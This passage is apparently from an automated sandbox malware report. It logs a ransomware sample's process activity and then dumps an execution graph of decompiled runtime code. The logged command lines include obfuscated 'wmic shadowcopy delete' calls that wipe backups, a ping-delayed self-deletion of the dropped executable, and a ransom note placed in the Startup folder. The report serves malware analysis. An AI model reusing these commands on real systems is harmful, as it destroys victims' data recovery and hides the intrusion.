                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:39
                                                                                                    Start time:03:28:25
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\klzShx\klzS\..\..\Windows\klzS\klzS\..\..\system32\klzS\klzS\..\..\wbem\klzS\klzSh\..\..\wmic.exe shadowcopy delete
                                                                                                    Imagebase:0x7ff7ceca0000
                                                                                                    File size:576'000 bytes
                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:40
                                                                                                    Start time:03:28:25
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:41
                                                                                                    Start time:03:28:25
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:42
                                                                                                    Start time:03:28:25
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:43
                                                                                                    Start time:03:28:25
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:ping 1.1.1.1 -n 1 -w 3000
                                                                                                    Imagebase:0x200000
                                                                                                    File size:18'944 bytes
                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:46
                                                                                                    Start time:03:28:30
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\NTdKVj\NTdK\..\..\Windows\NTdK\NTdK\..\..\system32\NTdK\NTdK\..\..\wbem\NTdK\NTdKV\..\..\wmic.exe shadowcopy delete
                                                                                                    Imagebase:0x7ff7ceca0000
                                                                                                    File size:576'000 bytes
                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:47
                                                                                                    Start time:03:28:30
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:48
                                                                                                    Start time:03:28:30
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:49
                                                                                                    Start time:03:28:30
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:50
                                                                                                    Start time:03:28:31
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:ping 1.1.1.1 -n 1 -w 3000
                                                                                                    Imagebase:0x200000
                                                                                                    File size:18'944 bytes
                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:51
                                                                                                    Start time:03:28:32
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\notepad.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
                                                                                                    Imagebase:0x7ff702c00000
                                                                                                    File size:201'216 bytes
                                                                                                    MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:2.7%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0.9%
                                                                                                      Total number of Nodes:1543
                                                                                                      Total number of Limit Nodes:13
                                                                                                      execution_graph 17087 6d407e76 17088 6d407e84 17087->17088 17089 6d407e7f 17087->17089 17093 6d407d40 17088->17093 17108 6d4085df 17089->17108 17095 6d407d4c ___scrt_is_nonwritable_in_current_image 17093->17095 17094 6d407d75 dllmain_raw 17097 6d407d8f dllmain_crt_dispatch 17094->17097 17104 6d407d5b 17094->17104 17095->17094 17096 6d407d70 17095->17096 17095->17104 17098 6d4024c0 __DllMainCRTStartup@12 85 API calls 17096->17098 17097->17096 17097->17104 17099 6d407db0 17098->17099 17100 6d407de1 17099->17100 17103 6d4024c0 __DllMainCRTStartup@12 85 API calls 17099->17103 17101 6d407dea dllmain_crt_dispatch 17100->17101 17100->17104 17102 6d407dfd dllmain_raw 17101->17102 17101->17104 17102->17104 17105 6d407dc8 17103->17105 17106 6d407c90 __DllMainCRTStartup@12 131 API calls 17105->17106 17107 6d407dd6 dllmain_raw 17106->17107 17107->17100 17109 6d4085f5 17108->17109 17110 6d4085fe 17109->17110 17112 6d408592 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 17109->17112 17110->17088 17112->17110 17113 6d410706 17124 6d41a368 17113->17124 17117 6d410723 17120 6d411902 _free 20 API calls 17117->17120 17122 6d410752 17120->17122 17123 6d411902 _free 20 API calls 17123->17117 17125 6d41a371 17124->17125 17126 6d410718 17124->17126 17160 6d41200a 17125->17160 17130 6d41a67e GetEnvironmentStringsW 17126->17130 17131 6d41a695 17130->17131 17132 6d41a6eb 17130->17132 17135 6d41a69b WideCharToMultiByte 17131->17135 17133 6d41a6f1 FreeEnvironmentStringsW 17132->17133 17134 6d41071d 17132->17134 17133->17134 17134->17117 17143 6d410758 17134->17143 17135->17132 17136 6d41a6b7 17135->17136 17137 6d41193c std::_Locinfo::_Locinfo_dtor 21 API calls 17136->17137 17138 6d41a6bd 17137->17138 17139 6d41a6da 17138->17139 17140 6d41a6c4 WideCharToMultiByte 17138->17140 17141 6d411902 _free 20 API calls 17139->17141 17140->17139 17142 6d41a6e8 17141->17142 17142->17132 17144 6d41076d 17143->17144 17145 6d414939 _unexpected 20 API calls 17144->17145 17154 6d410794 17145->17154 17146 6d4107f8 17147 6d411902 _free 20 API calls 17146->17147 17148 6d41072e 17147->17148 17148->17123 17149 6d414939 _unexpected 20 API calls 17149->17154 17150 6d4107fa 17360 6d410829 17150->17360 17152 6d410e96 ___std_exception_copy 26 API calls 17152->17154 17154->17146 17154->17149 17154->17150 17154->17152 17156 6d41081c 17154->17156 17158 6d411902 _free 20 API calls 17154->17158 17155 6d411902 _free 20 API calls 17155->17146 17157 6d40d352 __Getctype 11 API calls 17156->17157 17159 6d410828 17157->17159 17158->17154 17161 6d412015 17160->17161 17166 6d41201b 17160->17166 17163 6d414e42 _unexpected 11 API calls 17161->17163 17162 6d414e98 _unexpected 11 API calls 17164 6d412035 17162->17164 17163->17166 17165 6d412021 17164->17165 17167 6d414939 _unexpected 20 API calls 17164->17167 17168 6d40f989 IsInExceptionSpec 39 API calls 17165->17168 17170 6d41209a 17165->17170 17166->17162 17166->17165 17169 6d412045 17167->17169 17171 6d4120a3 17168->17171 17172 6d412062 17169->17172 17173 6d41204d 17169->17173 17185 6d41a1ba 17170->17185 17175 6d414e98 _unexpected 11 API calls 17172->17175 17174 6d414e98 _unexpected 11 API calls 17173->17174 17177 6d412059 17174->17177 17176 6d41206e 17175->17176 17178 6d412081 17176->17178 17179 6d412072 17176->17179 17182 6d411902 _free 20 API calls 17177->17182 17181 6d411d52 _unexpected 20 API calls 17178->17181 17180 6d414e98 _unexpected 11 API calls 17179->17180 17180->17177 17183 6d41208c 17181->17183 17182->17165 17184 6d411902 _free 20 API calls 17183->17184 17184->17165 17203 6d41a2d5 17185->17203 17187 6d41a1cd 17210 6d419f4e 17187->17210 17190 6d41a1e6 17190->17126 17191 6d41193c std::_Locinfo::_Locinfo_dtor 21 API calls 17192 6d41a1f7 17191->17192 17193 6d41a229 17192->17193 17217 6d41a3c3 17192->17217 17196 6d411902 _free 20 API calls 17193->17196 17196->17190 17197 6d41a224 17198 6d40de26 _free 20 API calls 17197->17198 17198->17193 17199 6d41a26d 17199->17193 17228 6d419e4a 17199->17228 17200 6d41a241 17200->17199 17201 6d411902 _free 20 API calls 17200->17201 17201->17199 17205 6d41a2e1 ___scrt_is_nonwritable_in_current_image 17203->17205 17206 6d41a360 _Fputc 17205->17206 17208 6d40f989 IsInExceptionSpec 39 API calls 17205->17208 17209 6d411902 _free 20 API calls 17205->17209 17236 6d40d447 EnterCriticalSection 17205->17236 17237 6d41a357 17205->17237 17206->17187 17208->17205 17209->17205 17241 6d40c15f 17210->17241 17213 6d419f81 17215 6d419f86 GetACP 17213->17215 17216 6d419f98 17213->17216 17214 6d419f6f GetOEMCP 17214->17216 17215->17216 17216->17190 17216->17191 17218 6d419f4e 41 API calls 17217->17218 17219 6d41a3e2 17218->17219 17222 6d41a440 IsValidCodePage 17219->17222 17223 6d41a432 GetACP 17219->17223 17225 6d41a3ec 17219->17225 17227 6d41a465 __cftof 17219->17227 17220 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17221 6d41a21c 17220->17221 17221->17197 17221->17200 17224 6d41a452 GetCPInfo 17222->17224 17222->17225 17223->17222 17223->17225 17224->17225 17224->17227 17225->17220 17258 6d41a026 GetCPInfo 17227->17258 17229 6d419e56 ___scrt_is_nonwritable_in_current_image 17228->17229 17334 6d40d447 EnterCriticalSection 17229->17334 17231 6d419e60 17335 6d419e8d 17231->17335 17235 6d419e79 _Fputc 17235->17193 17236->17205 17240 6d40d48f LeaveCriticalSection 17237->17240 17239 6d41a35e 17239->17205 17240->17239 17242 6d40c172 17241->17242 17243 6d40c17c 17241->17243 17242->17213 17242->17214 17243->17242 17244 6d411f56 _unexpected 39 API calls 17243->17244 17245 6d40c19d 17244->17245 17246 6d41219d __Getctype 39 API calls 17245->17246 17247 6d40c1b6 17246->17247 17249 6d4121ca 17247->17249 17250 6d4121f2 17249->17250 17251 6d4121dd 17249->17251 17250->17242 17251->17250 17253 6d41a3b0 17251->17253 17254 6d411f56 _unexpected 39 API calls 17253->17254 17255 6d41a3ba 17254->17255 17256 6d41a2d5 __cftof 39 API calls 17255->17256 17257 6d41a3c0 17256->17257 17257->17250 17259 6d41a10a 17258->17259 17265 6d41a060 17258->17265 17262 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17259->17262 17264 6d41a1b6 17262->17264 17264->17225 17268 6d415b4b 17265->17268 17267 6d415e35 44 API calls 17267->17259 17269 6d40c15f __cftof 39 API calls 17268->17269 17270 6d415b6b MultiByteToWideChar 17269->17270 17272 6d415c28 17270->17272 17273 6d415ba4 17270->17273 17274 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17272->17274 17275 6d41193c std::_Locinfo::_Locinfo_dtor 21 API calls 17273->17275 17279 6d415bbc __cftof __alloca_probe_16 17273->17279 17276 6d415c4b 17274->17276 17275->17279 17282 6d415e35 17276->17282 17277 6d415c22 17287 6d407964 17277->17287 17279->17277 17280 6d415bf8 MultiByteToWideChar 17279->17280 17280->17277 17281 6d415c12 GetStringTypeW 17280->17281 17281->17277 17283 6d40c15f __cftof 39 API calls 17282->17283 17284 6d415e48 17283->17284 17291 6d415c4f 17284->17291 17288 6d40797f 17287->17288 17289 6d40796e 17287->17289 17288->17272 17289->17288 17290 6d40d143 ___std_exception_copy 20 API calls 17289->17290 17290->17288 17293 6d415c6a 17291->17293 17292 6d415c90 MultiByteToWideChar 17294 6d415e0d 17292->17294 17295 6d415cbc 17292->17295 17293->17292 17296 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17294->17296 17300 6d41193c std::_Locinfo::_Locinfo_dtor 21 API calls 17295->17300 17304 6d415cd1 __alloca_probe_16 17295->17304 17297 6d415e20 17296->17297 17297->17267 17298 6d415d74 17303 6d407964 __freea 20 API calls 17298->17303 17299 6d415d09 MultiByteToWideChar 17299->17298 17301 6d415d20 17299->17301 17300->17304 17318 6d4150a1 17301->17318 17303->17294 17304->17298 17304->17299 17306 6d415d83 17308 6d41193c std::_Locinfo::_Locinfo_dtor 21 API calls 17306->17308 17312 6d415d95 __alloca_probe_16 17306->17312 17307 6d415d4b 17307->17298 17309 6d4150a1 std::_Locinfo::_Locinfo_dtor 11 API calls 17307->17309 17308->17312 17309->17298 17310 6d415dfe 17311 6d407964 __freea 20 API calls 17310->17311 17311->17298 17312->17310 17313 6d4150a1 std::_Locinfo::_Locinfo_dtor 11 API calls 17312->17313 17314 6d415ddd 17313->17314 17314->17310 17315 6d415dec WideCharToMultiByte 17314->17315 17315->17310 17316 6d415e2c 17315->17316 17317 6d407964 __freea 20 API calls 17316->17317 17317->17298 17319 6d414b57 std::_Locinfo::_Locinfo_dtor 5 API calls 17318->17319 17320 6d4150b7 17319->17320 17323 6d4150bd 17320->17323 17326 6d415115 17320->17326 17324 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17323->17324 17325 6d41510f 17324->17325 17325->17298 17325->17306 17325->17307 17331 6d414b71 17326->17331 17328 6d41512b std::_Locinfo::_Locinfo_dtor 17329 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17328->17329 17330 6d4150fd LCMapStringW 17329->17330 17330->17323 17332 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 17331->17332 17333 6d414b87 17332->17333 17333->17328 17334->17231 17345 6d40e91f 17335->17345 17337 6d419eaf 17338 6d40e91f __fread_nolock 26 API calls 17337->17338 17339 6d419ece 17338->17339 17340 6d419e6d 17339->17340 17341 6d411902 _free 20 API calls 17339->17341 17342 6d419e81 17340->17342 17341->17340 17359 6d40d48f LeaveCriticalSection 17342->17359 17344 6d419e8b 17344->17235 17346 6d40e930 17345->17346 17355 6d40e92c _Yarn 17345->17355 17347 6d40e937 17346->17347 17351 6d40e94a __cftof 17346->17351 17348 6d40de26 _free 20 API calls 17347->17348 17349 6d40e93c 17348->17349 17350 6d40d325 _Fputc 26 API calls 17349->17350 17350->17355 17352 6d40e981 17351->17352 17353 6d40e978 17351->17353 17351->17355 17352->17355 17357 6d40de26 _free 20 API calls 17352->17357 17354 6d40de26 _free 20 API calls 17353->17354 17356 6d40e97d 17354->17356 17355->17337 17358 6d40d325 _Fputc 26 API calls 17356->17358 17357->17356 17358->17355 17359->17344 17361 6d410800 17360->17361 17362 6d410836 17360->17362 17361->17155 17363 6d41084d 17362->17363 17364 6d411902 _free 20 API calls 17362->17364 17365 6d411902 _free 20 API calls 17363->17365 17364->17362 17365->17361 15456 6d407b36 15457 6d407b41 15456->15457 15458 6d407b74 15456->15458 15460 6d407b66 15457->15460 15461 6d407b46 15457->15461 15499 6d407c90 15458->15499 15468 6d407b89 15460->15468 15463 6d407b5c 15461->15463 15465 6d407b4b 15461->15465 15491 6d407fe4 15463->15491 15467 6d407b50 15465->15467 15486 6d408003 15465->15486 15469 6d407b95 ___scrt_is_nonwritable_in_current_image 15468->15469 15526 6d408074 15469->15526 15471 6d407b9c __DllMainCRTStartup@12 15472 6d407bc3 15471->15472 15473 6d407c88 15471->15473 15480 6d407c12 ___scrt_is_nonwritable_in_current_image 15471->15480 15537 6d407fd6 15472->15537 15553 6d40866b IsProcessorFeaturePresent 15473->15553 15476 6d407c8f 15477 6d407bd2 __RTC_Initialize 15477->15480 15540 6d40862a InitializeSListHead 15477->15540 15479 6d407be0 15541 6d40ff67 15479->15541 15480->15467 15484 6d407bff 15484->15480 15549 6d40ff0b 15484->15549 15657 6d410e10 15486->15657 15970 6d40a8ad 15491->15970 15494 6d407fed 15494->15467 15497 6d408000 15497->15467 15498 6d40a8b8 27 API calls 15498->15494 15501 6d407c9c ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 15499->15501 15500 6d407ca5 15500->15467 15501->15500 15502 6d407d38 15501->15502 15503 6d407ccd 15501->15503 15504 6d40866b __DllMainCRTStartup@12 4 API calls 15502->15504 16016 6d408044 15503->16016 15508 6d407d3f ___scrt_is_nonwritable_in_current_image 15504->15508 15506 6d407cd2 16025 6d408636 15506->16025 15509 6d407d75 dllmain_raw 15508->15509 15511 6d407d70 15508->15511 15522 6d407d5b 15508->15522 15512 6d407d8f dllmain_crt_dispatch 15509->15512 15509->15522 15510 6d407cd7 __RTC_Initialize __DllMainCRTStartup@12 16028 6d4081e5 15510->16028 15990 6d4024c0 15511->15990 15512->15511 15512->15522 15518 6d407de1 15519 6d407dea dllmain_crt_dispatch 15518->15519 15518->15522 15520 6d407dfd dllmain_raw 15519->15520 15519->15522 15520->15522 15521 6d4024c0 __DllMainCRTStartup@12 85 API calls 15523 6d407dc8 15521->15523 15522->15467 15524 6d407c90 __DllMainCRTStartup@12 126 API calls 15523->15524 15525 6d407dd6 dllmain_raw 15524->15525 15525->15518 15527 6d40807d 15526->15527 15557 6d408854 IsProcessorFeaturePresent 15527->15557 15531 6d40808e 15536 6d408092 15531->15536 15567 6d410df3 15531->15567 15534 6d4080a9 15534->15471 15536->15471 15651 6d4080ad 15537->15651 15539 6d407fdd 15539->15477 15540->15479 15542 6d40ff7e 15541->15542 15543 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15542->15543 15544 6d407bf4 15543->15544 15544->15480 15545 6d407fab 15544->15545 15546 6d407fb0 ___scrt_release_startup_lock 15545->15546 15547 6d407fb9 15546->15547 15548 6d408854 IsProcessorFeaturePresent 15546->15548 15547->15484 15548->15547 15550 6d40ff3a 15549->15550 15551 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15550->15551 15552 6d40ff63 15551->15552 15552->15480 15554 6d408681 __InternalCxxFrameHandler __cftof 15553->15554 15555 6d40872c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15554->15555 15556 6d408777 __InternalCxxFrameHandler 15555->15556 15556->15476 15558 6d408089 15557->15558 15559 6d40a88e 15558->15559 15576 6d40b9d7 15559->15576 15563 6d40a89f 15564 6d40a8aa 15563->15564 15590 6d40ba13 15563->15590 15564->15531 15566 6d40a897 15566->15531 15632 6d41a794 15567->15632 15570 6d40a8c3 15571 6d40a8d6 15570->15571 15572 6d40a8cc 15570->15572 15571->15536 15573 6d40aa9d ___vcrt_uninitialize_ptd 6 API calls 15572->15573 15574 6d40a8d1 15573->15574 15575 6d40ba13 ___vcrt_uninitialize_locks DeleteCriticalSection 15574->15575 15575->15571 15577 6d40b9e0 15576->15577 15579 6d40ba09 15577->15579 15580 6d40a893 15577->15580 15594 6d40bc14 15577->15594 15581 6d40ba13 ___vcrt_uninitialize_locks DeleteCriticalSection 15579->15581 15580->15566 15582 6d40aa6a 15580->15582 15581->15580 15613 6d40bb25 15582->15613 15587 6d40aa9a 15587->15563 15589 6d40aa7f 15589->15563 15591 6d40ba1e 15590->15591 15593 6d40ba3d 15590->15593 15592 6d40ba28 DeleteCriticalSection 15591->15592 15592->15592 15592->15593 15593->15566 15599 6d40badc 15594->15599 15597 6d40bc4c InitializeCriticalSectionAndSpinCount 15598 6d40bc37 15597->15598 15598->15577 15600 6d40baf4 15599->15600 15604 6d40bb17 15599->15604 15600->15604 15605 6d40ba42 15600->15605 15603 6d40bb09 GetProcAddress 15603->15604 15604->15597 15604->15598 15611 6d40ba4e ___vcrt_FlsSetValue 15605->15611 15606 6d40bac2 15606->15603 15606->15604 15607 6d40ba64 LoadLibraryExW 15608 6d40ba82 GetLastError 15607->15608 15609 6d40bac9 15607->15609 15608->15611 15609->15606 15610 6d40bad1 FreeLibrary 15609->15610 15610->15606 15611->15606 15611->15607 15612 6d40baa4 LoadLibraryExW 15611->15612 15612->15609 15612->15611 15614 6d40badc ___vcrt_FlsSetValue 5 API calls 15613->15614 15615 6d40bb3f 15614->15615 15616 6d40bb58 TlsAlloc 15615->15616 15617 6d40aa74 15615->15617 15617->15589 15618 6d40bbd6 15617->15618 15619 6d40badc ___vcrt_FlsSetValue 5 API calls 15618->15619 15620 6d40bbf0 15619->15620 15621 6d40bc0b TlsSetValue 15620->15621 15622 6d40aa8d 15620->15622 15621->15622 15622->15587 15623 6d40aa9d 15622->15623 15624 6d40aaad 15623->15624 15625 6d40aaa7 15623->15625 15624->15589 15627 6d40bb60 15625->15627 15628 6d40badc ___vcrt_FlsSetValue 5 API calls 15627->15628 15629 6d40bb7a 15628->15629 15630 6d40bb92 TlsFree 15629->15630 15631 6d40bb86 15629->15631 15630->15631 15631->15624 15635 6d41a7b1 15632->15635 15636 6d41a7ad 15632->15636 15634 6d40809b 15634->15534 15634->15570 15635->15636 15638 6d413f12 15635->15638 15643 6d407ac2 15636->15643 15639 6d413f19 15638->15639 15640 6d413f5c GetStdHandle 15639->15640 15641 6d413fc2 15639->15641 15642 6d413f6f GetFileType 15639->15642 15640->15639 15641->15635 15642->15639 15644 6d407aca 15643->15644 15645 6d407acb IsProcessorFeaturePresent 15643->15645 15644->15634 15647 6d4083cd 15645->15647 15650 6d408390 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15647->15650 15649 6d4084b0 15649->15634 15650->15649 15652 6d4080b9 15651->15652 15653 6d4080bd 15651->15653 15652->15539 15654 6d40866b __DllMainCRTStartup@12 4 API calls 15653->15654 15656 6d4080ca ___scrt_release_startup_lock 15653->15656 15655 6d408133 15654->15655 15656->15539 15663 6d411f28 15657->15663 15660 6d40a8b8 15950 6d40a95d 15660->15950 15664 6d408008 15663->15664 15665 6d411f32 15663->15665 15664->15660 15671 6d414e42 15665->15671 15691 6d414c53 15671->15691 15673 6d414e69 15674 6d414e81 TlsGetValue 15673->15674 15675 6d414e75 15673->15675 15674->15675 15676 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15675->15676 15677 6d411f39 15676->15677 15677->15664 15678 6d414e98 15677->15678 15679 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 15678->15679 15680 6d414ebf 15679->15680 15681 6d414eda TlsSetValue 15680->15681 15682 6d414ece 15680->15682 15681->15682 15683 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15682->15683 15684 6d411f4c 15683->15684 15685 6d411ded 15684->15685 15686 6d411df8 15685->15686 15687 6d411e08 15685->15687 15704 6d411e0e 15686->15704 15687->15664 15692 6d414c80 15691->15692 15696 6d414c7c std::_Locinfo::_Locinfo_dtor 15691->15696 15692->15696 15697 6d414b8b 15692->15697 15695 6d414c9a GetProcAddress 15695->15696 15696->15673 15701 6d414b9c ___vcrt_FlsSetValue 15697->15701 15698 6d414c46 15698->15695 15698->15696 15699 6d414bb9 LoadLibraryExW 15700 6d414bd4 GetLastError 15699->15700 15699->15701 15700->15701 15701->15698 15701->15699 15702 6d414c2f FreeLibrary 15701->15702 15703 6d414c07 LoadLibraryExW 15701->15703 15702->15701 15703->15701 15705 6d411e23 15704->15705 15709 6d411e29 15704->15709 15707 6d411902 _free 20 API calls 15705->15707 15706 6d411902 _free 20 API calls 15708 6d411e35 15706->15708 15707->15709 15710 6d411902 _free 20 API calls 15708->15710 15709->15706 15711 6d411e40 15710->15711 15712 6d411902 _free 20 API calls 15711->15712 15713 6d411e4b 15712->15713 15714 6d411902 _free 20 API calls 15713->15714 15715 6d411e56 15714->15715 15716 6d411902 _free 20 API calls 15715->15716 15717 6d411e61 15716->15717 15718 6d411902 _free 20 API calls 15717->15718 15719 6d411e6c 15718->15719 15720 6d411902 _free 20 API calls 15719->15720 15721 6d411e77 15720->15721 15722 6d411902 _free 20 API calls 15721->15722 15723 6d411e82 15722->15723 15724 6d411902 _free 20 API calls 15723->15724 15725 6d411e90 15724->15725 15736 6d411c56 15725->15736 15727 6d411eb6 15744 6d411cb7 15727->15744 15729 6d411e00 15730 6d411902 15729->15730 15731 6d41190d HeapFree 15730->15731 15735 6d411936 _free 15730->15735 15732 6d411922 15731->15732 15731->15735 15876 6d40de26 15732->15876 15735->15687 15737 6d411c62 ___scrt_is_nonwritable_in_current_image 15736->15737 15752 6d40d447 EnterCriticalSection 15737->15752 15740 6d411c6c 15742 6d411902 _free 20 API calls 15740->15742 15743 6d411c96 15740->15743 15741 6d411ca3 _Fputc 15741->15727 15742->15743 15753 6d411cab 15743->15753 15745 6d411cc3 ___scrt_is_nonwritable_in_current_image 15744->15745 15757 6d40d447 EnterCriticalSection 15745->15757 15747 6d411ccd 15758 6d411edd 15747->15758 15749 6d411ce0 15762 6d411cf6 15749->15762 15751 6d411cee _Fputc 15751->15729 15752->15740 15756 6d40d48f LeaveCriticalSection 15753->15756 15755 6d411cb5 15755->15741 15756->15755 15757->15747 15759 6d411f13 __Getctype 15758->15759 15760 6d411eec __Getctype 15758->15760 15759->15749 15760->15759 15765 6d41a996 15760->15765 15875 6d40d48f LeaveCriticalSection 15762->15875 15764 6d411d00 15764->15751 15766 6d41a9ac 15765->15766 15767 6d41aa16 15765->15767 15766->15767 15771 6d41a9df 15766->15771 15774 6d411902 _free 20 API calls 15766->15774 15769 6d411902 _free 20 API calls 15767->15769 15792 6d41aa64 15767->15792 15770 6d41aa38 15769->15770 15772 6d411902 _free 20 API calls 15770->15772 15773 6d41aa01 15771->15773 15779 6d411902 _free 20 API calls 15771->15779 15775 6d41aa4b 15772->15775 15776 6d411902 _free 20 API calls 15773->15776 15777 6d41a9d4 15774->15777 15778 6d411902 _free 20 API calls 15775->15778 15780 6d41aa0b 15776->15780 15793 6d41c12f 15777->15793 15784 6d41aa59 15778->15784 15785 6d41a9f6 15779->15785 15786 6d411902 _free 20 API calls 15780->15786 15781 6d41aad2 15782 6d411902 _free 20 API calls 15781->15782 15787 6d41aad8 15782->15787 15789 6d411902 _free 20 API calls 15784->15789 15821 6d41c5e8 15785->15821 15786->15767 15787->15759 15788 6d41aa72 15788->15781 15791 6d411902 20 API calls _free 15788->15791 15789->15792 15791->15788 15833 6d41ab09 15792->15833 15794 6d41c140 15793->15794 15820 6d41c229 15793->15820 15795 6d41c151 15794->15795 15797 